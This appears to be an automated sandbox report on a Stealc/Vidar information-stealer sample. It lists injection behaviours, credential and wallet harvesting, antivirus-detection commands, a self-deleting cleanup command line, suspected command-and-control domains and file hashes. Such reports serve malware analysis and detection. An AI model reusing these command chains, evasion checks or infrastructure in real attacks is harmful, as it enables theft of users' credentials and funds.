Description	Indicator	Process	Target
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A

Stealc

stealer stealc

Suspicious use of NtCreateUserProcessOtherParentProcess

Description	Indicator	Process	Target
PID 336 created 1196	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	C:\Windows\Explorer.EXE

Vidar

stealer vidar

Downloads MZ/PE file

Executes dropped EXE

Description	Indicator	Process	Target
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A
N/A	N/A	C:\ProgramData\BFCFBKKKFH.exe	N/A
N/A	N/A	C:\ProgramData\CGDBFBGIDH.exe	N/A

Loads dropped DLL

Description	Indicator	Process	Target
N/A	N/A	C:\Windows\SysWOW64\cmd.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Checks installed software on the system

discovery

Suspicious use of SetThreadContext

Description	Indicator	Process	Target
PID 336 set thread context of 2260	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif
PID 2436 set thread context of 2308	N/A	C:\ProgramData\CGDBFBGIDH.exe	C:\Windows\SysWOW64\ftp.exe
PID 2524 set thread context of 2464	N/A	C:\ProgramData\BFCFBKKKFH.exe	C:\Windows\SysWOW64\ftp.exe

Drops file in Windows directory

Description	Indicator	Process	Target
File created	C:\Windows\Tasks\Watcher Com SH.job	C:\Windows\SysWOW64\ftp.exe	N/A
File created	C:\Windows\Tasks\TWI Cloud Host.job	C:\Windows\SysWOW64\ftp.exe	N/A

Enumerates physical storage devices

Checks processor information in registry

Description	Indicator	Process	Target
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A

Delays execution with timeout.exe

evasion

Description	Indicator	Process	Target
N/A	N/A	C:\Windows\SysWOW64\timeout.exe	N/A
N/A	N/A	C:\Windows\SysWOW64\timeout.exe	N/A

Enumerates processes with tasklist

Description	Indicator	Process	Target
N/A	N/A	C:\Windows\SysWOW64\tasklist.exe	N/A
N/A	N/A	C:\Windows\SysWOW64\tasklist.exe	N/A

Modifies system certificate store

evasion spyware trojan

Description	Indicator	Process	Target
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A

Suspicious behavior: EnumeratesProcesses

Description	Indicator	Process	Target
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A
N/A	N/A	C:\ProgramData\CGDBFBGIDH.exe	N/A
N/A	N/A	C:\ProgramData\BFCFBKKKFH.exe	N/A
N/A	N/A	C:\ProgramData\CGDBFBGIDH.exe	N/A
N/A	N/A	C:\ProgramData\BFCFBKKKFH.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A
N/A	N/A	C:\Windows\SysWOW64\ftp.exe	N/A
N/A	N/A	C:\Windows\SysWOW64\ftp.exe	N/A
N/A	N/A	C:\Windows\SysWOW64\ftp.exe	N/A
N/A	N/A	C:\Windows\SysWOW64\ftp.exe	N/A

Suspicious behavior: MapViewOfSection

Description	Indicator	Process	Target
N/A	N/A	C:\ProgramData\CGDBFBGIDH.exe	N/A
N/A	N/A	C:\ProgramData\BFCFBKKKFH.exe	N/A
N/A	N/A	C:\Windows\SysWOW64\ftp.exe	N/A
N/A	N/A	C:\Windows\SysWOW64\ftp.exe	N/A

Suspicious use of AdjustPrivilegeToken

Description	Indicator	Process	Target
Token: SeDebugPrivilege	N/A	C:\Windows\SysWOW64\tasklist.exe	N/A
Token: SeDebugPrivilege	N/A	C:\Windows\SysWOW64\tasklist.exe	N/A

Suspicious use of FindShellTrayWindow

Description	Indicator	Process	Target
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A

Suspicious use of SendNotifyMessage

Description	Indicator	Process	Target
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A

Suspicious use of WriteProcessMemory

Description	Indicator	Process	Target
PID 3016 wrote to memory of 2572	N/A	C:\Users\Admin\AppData\Local\Temp\Setup (10).exe	C:\Windows\SysWOW64\cmd.exe
PID 3016 wrote to memory of 2572	N/A	C:\Users\Admin\AppData\Local\Temp\Setup (10).exe	C:\Windows\SysWOW64\cmd.exe
PID 3016 wrote to memory of 2572	N/A	C:\Users\Admin\AppData\Local\Temp\Setup (10).exe	C:\Windows\SysWOW64\cmd.exe
PID 3016 wrote to memory of 2572	N/A	C:\Users\Admin\AppData\Local\Temp\Setup (10).exe	C:\Windows\SysWOW64\cmd.exe
PID 2572 wrote to memory of 2820	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\tasklist.exe
PID 2572 wrote to memory of 2820	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\tasklist.exe
PID 2572 wrote to memory of 2820	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\tasklist.exe
PID 2572 wrote to memory of 2820	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\tasklist.exe
PID 2572 wrote to memory of 2828	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\findstr.exe
PID 2572 wrote to memory of 2828	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\findstr.exe
PID 2572 wrote to memory of 2828	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\findstr.exe
PID 2572 wrote to memory of 2828	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\findstr.exe
PID 2572 wrote to memory of 2400	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\tasklist.exe
PID 2572 wrote to memory of 2400	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\tasklist.exe
PID 2572 wrote to memory of 2400	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\tasklist.exe
PID 2572 wrote to memory of 2400	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\tasklist.exe
PID 2572 wrote to memory of 2168	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\findstr.exe
PID 2572 wrote to memory of 2168	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\findstr.exe
PID 2572 wrote to memory of 2168	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\findstr.exe
PID 2572 wrote to memory of 2168	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\findstr.exe
PID 2572 wrote to memory of 2764	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\cmd.exe
PID 2572 wrote to memory of 2764	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\cmd.exe
PID 2572 wrote to memory of 2764	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\cmd.exe
PID 2572 wrote to memory of 2764	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\cmd.exe
PID 2572 wrote to memory of 1240	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\findstr.exe
PID 2572 wrote to memory of 1240	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\findstr.exe
PID 2572 wrote to memory of 1240	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\findstr.exe
PID 2572 wrote to memory of 1240	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\findstr.exe
PID 2572 wrote to memory of 1944	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\cmd.exe
PID 2572 wrote to memory of 1944	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\cmd.exe
PID 2572 wrote to memory of 1944	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\cmd.exe
PID 2572 wrote to memory of 1944	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\cmd.exe
PID 2572 wrote to memory of 336	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif
PID 2572 wrote to memory of 336	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif
PID 2572 wrote to memory of 336	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif
PID 2572 wrote to memory of 336	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif
PID 2572 wrote to memory of 592	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\timeout.exe
PID 2572 wrote to memory of 592	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\timeout.exe
PID 2572 wrote to memory of 592	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\timeout.exe
PID 2572 wrote to memory of 592	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\timeout.exe
PID 336 wrote to memory of 2260	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif
PID 336 wrote to memory of 2260	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif
PID 336 wrote to memory of 2260	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif
PID 336 wrote to memory of 2260	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif
PID 336 wrote to memory of 2260	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif
PID 336 wrote to memory of 2260	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif
PID 2260 wrote to memory of 2524	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	C:\ProgramData\BFCFBKKKFH.exe
PID 2260 wrote to memory of 2524	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	C:\ProgramData\BFCFBKKKFH.exe
PID 2260 wrote to memory of 2524	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	C:\ProgramData\BFCFBKKKFH.exe
PID 2260 wrote to memory of 2524	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	C:\ProgramData\BFCFBKKKFH.exe
PID 2260 wrote to memory of 2436	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	C:\ProgramData\CGDBFBGIDH.exe
PID 2260 wrote to memory of 2436	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	C:\ProgramData\CGDBFBGIDH.exe
PID 2260 wrote to memory of 2436	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	C:\ProgramData\CGDBFBGIDH.exe
PID 2260 wrote to memory of 2436	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	C:\ProgramData\CGDBFBGIDH.exe
PID 2436 wrote to memory of 2308	N/A	C:\ProgramData\CGDBFBGIDH.exe	C:\Windows\SysWOW64\ftp.exe
PID 2436 wrote to memory of 2308	N/A	C:\ProgramData\CGDBFBGIDH.exe	C:\Windows\SysWOW64\ftp.exe
PID 2436 wrote to memory of 2308	N/A	C:\ProgramData\CGDBFBGIDH.exe	C:\Windows\SysWOW64\ftp.exe
PID 2436 wrote to memory of 2308	N/A	C:\ProgramData\CGDBFBGIDH.exe	C:\Windows\SysWOW64\ftp.exe
PID 2524 wrote to memory of 2464	N/A	C:\ProgramData\BFCFBKKKFH.exe	C:\Windows\SysWOW64\ftp.exe
PID 2524 wrote to memory of 2464	N/A	C:\ProgramData\BFCFBKKKFH.exe	C:\Windows\SysWOW64\ftp.exe
PID 2524 wrote to memory of 2464	N/A	C:\ProgramData\BFCFBKKKFH.exe	C:\Windows\SysWOW64\ftp.exe
PID 2524 wrote to memory of 2464	N/A	C:\ProgramData\BFCFBKKKFH.exe	C:\Windows\SysWOW64\ftp.exe
PID 2260 wrote to memory of 704	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	C:\Windows\SysWOW64\cmd.exe
PID 2260 wrote to memory of 704	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	C:\Windows\SysWOW64\cmd.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\Setup (10).exe

"C:\Users\Admin\AppData\Local\Temp\Setup (10).exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k copy Secretariat Secretariat.cmd & Secretariat.cmd & exit

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "wrsa.exe opssvc.exe"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c md 150746

C:\Windows\SysWOW64\findstr.exe

findstr /V "reachedindicatingfindlawfu" Cologne

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b Abroad 150746\e

C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif

150746\Mind.pif 150746\e

C:\Windows\SysWOW64\timeout.exe

timeout 5

C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif

C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif

C:\ProgramData\BFCFBKKKFH.exe

"C:\ProgramData\BFCFBKKKFH.exe"

C:\ProgramData\CGDBFBGIDH.exe

"C:\ProgramData\CGDBFBGIDH.exe"

C:\Windows\SysWOW64\ftp.exe

C:\Windows\SysWOW64\ftp.exe

C:\Windows\SysWOW64\ftp.exe

C:\Windows\SysWOW64\ftp.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\FIIJJKKFHIEH" & exit

C:\Windows\SysWOW64\timeout.exe

timeout /t 10

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

Network

Country	Destination	Domain	Proto
US	8.8.8.8:53	WAmbXuXSzuXabiImZi.WAmbXuXSzuXabiImZi	udp
US	8.8.8.8:53	theemir.xyz	udp
US	104.21.81.243:443	theemir.xyz	tcp
US	104.21.81.243:443	theemir.xyz	tcp
US	104.21.81.243:443	theemir.xyz	tcp
US	8.8.8.8:53	c.pki.goog	udp
GB	172.217.169.67:80	c.pki.goog	tcp
US	104.21.81.243:443	theemir.xyz	tcp
US	104.21.81.243:443	theemir.xyz	tcp
US	104.21.81.243:443	theemir.xyz	tcp
US	104.21.81.243:443	theemir.xyz	tcp
US	104.21.81.243:443	theemir.xyz	tcp
US	104.21.81.243:443	theemir.xyz	tcp
US	8.8.8.8:53	businessdownloads.ltd	udp
US	172.67.212.123:443	businessdownloads.ltd	tcp
US	104.21.81.243:443	theemir.xyz	tcp
US	104.21.81.243:443	theemir.xyz	tcp
US	104.21.81.243:443	theemir.xyz	tcp
US	8.8.8.8:53	i.imgur.com	udp
US	199.232.196.193:443	i.imgur.com	tcp
US	104.21.81.243:443	theemir.xyz	tcp
US	104.21.81.243:443	theemir.xyz	tcp
US	104.21.81.243:443	theemir.xyz	tcp
US	104.21.81.243:443	theemir.xyz	tcp
US	8.8.8.8:53	proresupdate.com	udp
US	45.152.112.146:80	proresupdate.com	tcp

Files

C:\Users\Admin\AppData\Local\Temp\Secretariat

MD5	7f01361524f94ccde5107595e2c54200
SHA1	c1b34c5781d2f042c81c3a8128d2a9d5b7b7a084
SHA256	903bedd93e8ec45d8083f33181b8f64612c075bfddf55fc4fb5a5443f5c578dd
SHA512	bb19216799526c5c7f2bf1f29e529d63c2cd6f6cef0c9e3b236a8e90d836a655d0eb7f62a9aa91dcf8f1c8d8f0ea9753252a5e54f49768315844847196dae064

C:\Users\Admin\AppData\Local\Temp\Cologne

MD5	a7e0c610d9e51e1f07ed50a2698d841c
SHA1	856bf97f63d5b1629a73def5b539454e2bdf0925
SHA256	4458046d4cefd31f95c9844044f68b7fc95311a5e25d085a2882c6426d07977d
SHA512	60ab445f726323b9ea37eb328015dbf752065f9091d4ef19ccdf3c567e0ae731ba633a78334e245b7b5219f1580ccf8dc7790084255ae8bf143a559cbf11adc6

C:\Users\Admin\AppData\Local\Temp\Estates

MD5	e3b5843f44d2382246054ea8b0706383
SHA1	a3036166a029bb1975129896e091daf40d820999
SHA256	2a790ae2e21ecf6c83b670a22509aeeca5a3ba67698cdd534817ff6e49957a84
SHA512	eac7c2bc9bfa0ad36a112b0f6878af59f9d6644e5f98842f069e741165d48d5c393790d939725c2d11606609a63ba1983c60753c3c9c4c4c273d49788190e2f8

C:\Users\Admin\AppData\Local\Temp\Reasons

MD5	99f7825b887660ea8f043d913522545b
SHA1	f6d36f0385ec836a40572bfcf605c8905b1a600a
SHA256	61ca2c5de8554fd7afe374c06203ea7832fdfff03f6512ef637328c66a6091a9
SHA512	ff1b9ff9aecf55b35c817e49adc0f580a45875976c462d03984eba97f93d57650da7724b42c2105eac0579c865c204e776ef762d984600c7e96fc574ace28cd2

C:\Users\Admin\AppData\Local\Temp\Race

MD5	677c8b24ad59b6eef5dfb3faf7e0974a
SHA1	6e52ce41957b616aff5481493c30b7d84090a562
SHA256	b2f80e63c5e1073731a4656fa3e6d23d6cb7dd43d70ebea566b6bee00fee9bfd
SHA512	e013f8d3bbe9ebbf25635efb17d3554056c8318af4908825820dab0393d4ac9a26de55e4f168ba0cc84294a657680887b74b59d2b15c340b9a990021f6269c7a

C:\Users\Admin\AppData\Local\Temp\Changed

MD5	a2d24d16e1b5a0972e95b39e1d9a251b
SHA1	a5f7c2bcbbffef058fafe1b62c3825ce26ea5ed6
SHA256	c56805d59fc6c67afb039850fb018d90ee11ccdbecf6f7db0880f0d29e5e2a07
SHA512	8203f0ca64e37f40c923216a09216387ba9e0ef35fac7b3df1b409216ae8b4b85fb178d0622482ce04ac1cba68af938c75272b31ca3a740a1061103785e4cfad

C:\Users\Admin\AppData\Local\Temp\Lake

MD5	5ef48073ad8953dbc25cb95852577d58
SHA1	da11413d729915a120e16e15c47201ad1afd7157
SHA256	30c013ba41821acae05a5359ce75857ca66cdb03adf4560c6c0aaf2eff7b19a8
SHA512	172afe33b31994af02e8e3d13ca5a285d8869671d00fecd8e147dde26eb8e493cafbae9a60f6ef49eac8221a0e1176e625043539b2b321a934647539ae22d00d

C:\Users\Admin\AppData\Local\Temp\Fx

MD5	dfedbc594137615c08a79052a8f79e4b
SHA1	164812d22a6559b86883089a2b5b3cb2d97c320f
SHA256	7e2d5e98eefd6cc1fa44a4dda125c2d986ff0bd6b6af488213bc4992d3d6ee6e
SHA512	0ebd7c128464eaae4ba196a45201c646e669021f7a2005aa04471b521373474cc3dd8df55792585fd92bdbd6297a0fb31af18e72111fd8aa3bf39113bcb29235

C:\Users\Admin\AppData\Local\Temp\Then

MD5	33271f00b044ed98071d84807c2158c8
SHA1	392e6351a844de7b50be3486db834321f625b7e1
SHA256	eaab5d35bea196961ffb36b423caed9d42a6cdf723759a67d5c865db6d906eb1
SHA512	0cc39c715573a5b2e81621e83dcdaa09b29530e044be223e0b62913aa77940f196429845fca46e0838781eecd6accacb7083b95bccf60f9f3fff37d096f8a788

C:\Users\Admin\AppData\Local\Temp\Timeline

MD5	3876d86dce4359c2e28a693d2c24577f
SHA1	373222b9a4d6f9116feac281725156f024a464fc
SHA256	30286f45ff66b72cc1a5c493442f5c57c0f2c7d729f663793c57c3b8dba4cf4d
SHA512	9289622b7e57f1ce380d41073ab42dc4376d3c156d8b82f60d166650a138c6190cf98ae35002ae11f5b31926dd92f3de3724d77f9e4ed2427151794a9b03fe7e

C:\Users\Admin\AppData\Local\Temp\Destiny

MD5	ae51ee350f9b67d464fef7951cefe7ef
SHA1	109023e02149e2282322d285c00810a1cef0e3de
SHA256	658b597ecc79cf8cae6883b1bd37c014da410731d9ec9774b2952e8d9041793e
SHA512	bf84d806d2c10b331af8a195b654eaf7049c252db9120f72aff28cf263727b88fb432bb05f911afca7509c485f8df5b1c162ec91e4b88c76f0c19eb99f080f99

